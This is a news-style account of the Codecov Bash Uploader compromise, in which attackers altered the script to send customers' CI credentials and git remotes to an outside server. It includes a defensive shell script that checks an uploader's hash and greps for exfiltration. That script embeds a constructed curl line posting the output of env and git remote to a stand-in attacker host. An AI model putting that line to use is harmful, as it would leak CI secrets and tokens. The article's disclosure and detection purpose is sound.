Famous Codecov Coverage Tool Gets Hacked and Hijacks Dev Credentials!

Codecov, an organization that hosts code coverage reports and statistics online, disclosed on Thursday that attackers had modified its Bash Uploader script to harvest confidential information from customers' continuous integration (CI) environments.

The organization discovered the tampering on 1 April, but its investigation showed that the supply-chain attack had actually begun in January.

What Happened in January?

Codecov helps developers measure how much of their source code is exercised by their tests, a process known as code coverage. Low coverage points to code paths that the tests never execute, which is where bugs and unwanted errors can go unnoticed.

The company serves more than 29,000 enterprises, including big names such as Atlassian, the Washington Post, the Royal Bank of Canada, Procter & Gamble, and GoDaddy.

The Bash Uploader is the tool Codecov customers use to send coverage data to the platform. It detects the CI-specific settings of the environment it runs in, collects the coverage reports, and uploads them.

The attackers' goal was to harvest data from customers' CI runs, and the tampering began on 31 January. They altered the script so that it exported details from the customer's environment to a server hosted outside Codecov's infrastructure; the exfiltration was performed by a single added line, found at line 525 of the script.


The weakness that let the attackers in was an error in the process that builds Codecov's Docker image. It allowed them to extract the credential that protected the Bash Uploader script from modification, and with it they were able to alter the script.

Given what the Bash Uploader collects, the organization said that the malicious version could have exported the sensitive data listed below:

  • Any tokens, keys, or credentials that customers pass through the CI runner and that are accessible when the Bash Uploader script is executed
  • Any datastores, services, and application code that can be reached using those credentials, keys, or tokens
  • Git remote information, i.e. the URL of the origin repository, for every repository that used the Bash Uploader to upload coverage to Codecov from CI

All potentially affected users are strongly advised to re-roll (rotate) any credentials, keys, or tokens that were present in the environment variables of CI processes that ran the Bash Uploader.

Customers should check their local copy of the script to see whether the attacker's line is present at line 525. If it is, they should replace the file with the latest version of the script from Codecov.
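The check described above can be scripted so that it runs on every CI job rather than once by hand. The script below is an added example written for this article, not Codecov's own code: it audits a local copy of an uploader script against a pinned SHA-256 and, if the hash differs, points at lines that post the CI environment or git remotes to a host other than codecov.io, which is the behaviour the article attributes to the added line. The two sample scripts, the host attacker.invalid and the appended exfiltration line are constructed for the example to match that description; they are not the real Bash Uploader or the real attacker line.

```shell
#!/usr/bin/env bash
# Added example (editor's code, not Codecov's): audit a local copy of an
# uploader script for (a) drift from a pinned known-good SHA-256 and
# (b) lines that ship the CI environment or git remotes to an outside host.
set -u

# ---- constructed sample scripts (stand-ins, not the real Bash Uploader) ----
CLEAN_SCRIPT='#!/usr/bin/env bash
# minimal stand-in for an uploader: reads CI env vars, posts a report
report="$(git remote -v 2>/dev/null)"
curl -s -X POST --data-binary "@coverage.txt" "https://codecov.io/upload/v4?token=${CODECOV_TOKEN:-}"
'
# Same script with one line appended, modelled on the behaviour the article
# describes (environment plus git remotes posted to a non-Codecov server).
# attacker.invalid is a placeholder host, not the real address.
TAMPERED_SCRIPT="${CLEAN_SCRIPT}"'curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://attacker.invalid/upload
'

# sha256_of: print the SHA-256 of stdin (coreutils sha256sum or macOS shasum)
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then sha256sum | cut -d' ' -f1
  else shasum -a 256 | cut -d' ' -f1; fi
}

# find_exfil_lines FILE: print the numbers of lines that use curl/wget,
# reference the environment or git remotes, and do not target codecov.io.
# This is a heuristic to locate the offending line; the hash check is the
# authoritative test.
ENV_DUMP='\$\(env\)|(^|[ |;(])env([ |;)]|$)|printenv|git remote'
find_exfil_lines() {
  grep -nE '(curl|wget)' "$1" \
    | grep -E "$ENV_DUMP" \
    | grep -v 'codecov\.io' \
    | cut -d: -f1
}

# audit_uploader FILE EXPECTED_SHA256 -> exit code
#   0  file matches the pinned hash
#   1  hash differs, no exfil-looking line found (diff it against the vendor copy)
#   2  hash differs and exfil-looking lines were found (their numbers are printed)
audit_uploader() {
  actual="$(sha256_of < "$1")"
  [ "$actual" = "$2" ] && return 0
  hits="$(find_exfil_lines "$1")"
  if [ -n "$hits" ]; then
    printf '%s: line(s) %s post environment/git data to a non-Codecov host\n' \
      "$1" "$(printf '%s\n' "$hits" | paste -sd, -)"
    return 2
  fi
  printf '%s: checksum mismatch (%s), review the diff\n' "$1" "$actual"
  return 1
}

# ---- demo: write the samples to a temp dir and audit both ------------------
workdir="$(mktemp -d)"
trap 'rm -rf "$workdir"' EXIT
printf '%s' "$CLEAN_SCRIPT"    > "$workdir/codecov-clean"
printf '%s' "$TAMPERED_SCRIPT" > "$workdir/codecov-tampered"
# In CI, take this value from the vendor's published checksum file and pin it
# in the pipeline config; here it is computed from the constructed clean copy.
PINNED_SHA256="$(sha256_of < "$workdir/codecov-clean")"

audit_uploader "$workdir/codecov-clean" "$PINNED_SHA256";    echo "clean: rc=$?"
audit_uploader "$workdir/codecov-tampered" "$PINNED_SHA256"; echo "tampered: rc=$?"
```

The pattern match is deliberately second to the checksum: an attacker who knows the grep can write the same exfiltration without the words `env` or `git remote` on one line, but cannot make a modified file hash to the pinned value. Pinning the hash also replaces the `bash <(curl -s ...)` style of invocation, which executes whatever the server returns on that day, with a copy that is verified before it runs.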

What Preventions did the Organization Take?


In the original version, the script read CI settings from environment variables and uploaded coverage data to Codecov's platform. In the modified version, the Bash Uploader also sent the contents of those environment variables to an address chosen by the attackers.

The organization has taken the following steps to contain the attack and undo its effects:

  • Auditing where the compromised key was accessible
  • Rotating all relevant internal credentials, including the key used to update the Bash Uploader
  • Working with the hosting provider of the third-party server to confirm that the web server was properly decommissioned
  • Setting up additional auditing and monitoring tools, and revoking any access that could be used to change the Bash Uploader again

The organization also said that the attack affects the security policies, practices, controls, and procedures it had in place, and that it is continuously monitoring its network and systems for any unwanted activity.
